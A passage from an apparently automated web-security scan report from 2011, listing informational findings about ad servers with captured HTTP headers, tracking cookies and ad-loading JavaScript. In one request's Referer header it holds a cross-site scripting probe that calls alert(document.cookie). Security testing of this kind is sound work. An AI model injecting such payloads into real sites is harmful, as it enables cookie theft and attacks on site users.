g7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELREBCeeahnJarbE4M_xRXSdcI4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uArmd3R-3GB_5MYwOq85GCPrroyEbUu1YcBKQ_cg-hbF8rzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5mRgdipTgep3AUio_lJCnAqkyDNvm3H1NmzXXu3S3_LZiqCijYqePrBOzNVUtyBCE9w7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Set-Cookie: pf=Mgovx84h_Ov--Xj3--F0rsLmce8wzSDXw3BvrEZAKNiJwV9kSIzX4BtZ7vBDkFqivBHW9RKwIdLIwhhMny1M2H4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:09 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:08 GMT
Content-Length: 10126

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.4;abr=!ie;sz=728x90;ord=3636088819337780094?;click=http://r.turn.com/r/tpclick/id/fttlMIT7dTL47AUAbwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=3636088819337780094?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.4;abr=!ie4;abr=!ie5;sz=728x90;ord=3636088819337780094?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.90. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?&pub=6264177&code=14383603&cch=14381728&l=300x250&tmz=-6&area=0&res=1920&rnd=0.04441207833588123&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=4434400651657365963?
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;
http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:03:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Set-Cookie: pf=V_hBBoSZrvzxwVsylnKaXvamneyvQhRVH4dyk1q1DU-JwV9kSIzX4BtZ7vBDkFqiiL8UzCzja6AU_RwAB28KJ34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:03:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:03:23 GMT
Content-Length: 10132

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n\n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5157804.5;abr=!ie;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/;">\n</SCRIPT>
...[SNIP]...
95%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/http://ad.doubleclick.net/jump/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=4434400651657365963?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.152304.TRADEDESK/B5157804.5;abr=!ie4;abr=!ie5;sz=300x250;ord=4434400651657365963?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.91. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1603038

The response contains the following link to another domain:

http://content.yieldmanager.com/ak/q.gif

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 28 Jan 2011 21:57:38 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

17.92. http://ads.roiserver.com/disp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.roiserver.com
Path:	/disp

Issue detail

The page was loaded from a URL containing a query string:

http://ads.roiserver.com/disp?pid=0CC81D8&rand=90638474

The response contains the following links to other domains:

http://roiserver.sitescout.netdna-cdn.com/acaiani-83234ed.gif
http://roiserver.sitescout.netdna-cdn.com/fext/skin-2.jpg
http://roiserver.sitescout.netdna-cdn.com/roiserver.gif
http://roiserver.sitescout.netdna-cdn.com/teethani-a7612d7.gif

Request

GET /disp?pid=0CC81D8&rand=90638474 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 4872
Date: Fri, 28 Jan 2011 14:14:36 GMT
Connection: close

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
<td class="adsBy">
<img src="http://roiserver.sitescout.netdna-cdn.com/roiserver.gif">
</td>
...[SNIP]...
<td class="tadHoriImg" onmouseover="this.style.cursor='pointer'" onclick="window.open('http://ads.roiserver.com/click?clid=e5656a6&rand=1296224076876&sid=', '_blank')">
<img src="http://roiserver.sitescout.netdna-cdn.com/acaiani-83234ed.gif" alt="1 Trick of a Tiny Belly:"/>
</td>
...[SNIP]...
<td class="tadHoriImg" onmouseover="this.style.cursor='pointer'" onclick="window.open('http://ads.roiserver.com/click?clid=2f9b4a3&rand=1296224076877&sid=', '_blank')">
<img src="http://roiserver.sitescout.netdna-cdn.com/fext/skin-2.jpg" alt="Dallas Moms $5 Wrinkle Trick"/>
</td>
...[SNIP]...
<td class="tadHoriImg" onmouseover="this.style.cursor='pointer'" onclick="window.open('http://ads.roiserver.com/click?clid=7412644&rand=1296224076877&sid=', '_blank')">
<img src="http://roiserver.sitescout.netdna-cdn.com/teethani-a7612d7.gif" alt="Dallas Moms Teeth Trick"/>
</td>
...[SNIP]...

17.93. http://adsfac.us/link.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/link.asp

Issue detail

The page was loaded from a URL containing a query string:

http://adsfac.us/link.asp?cc=QAN007.310005.0&CreativeID=30281

The response contains the following link to another domain:

http://www.qantasvacations.com/sydney/?utm_campaign=SpectacularSydney&utm_medium=listing&utm_source=QFOnineAds&utm_content=&utm_term=sydney

Request

Response

17.94. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90?http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543^950189^81^0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1940003036?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.5;abr=!ie;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?
http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.5;abr=!ie4;abr=!ie5;sz=160x600;ord=1940003036?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000753543/mnum=0000950189/cstr=39420189=_4d433bda,2510810860,753543_950189_81_0,1_/xsxdata=$XSXDATA/bnum=39420189/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1940003036?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
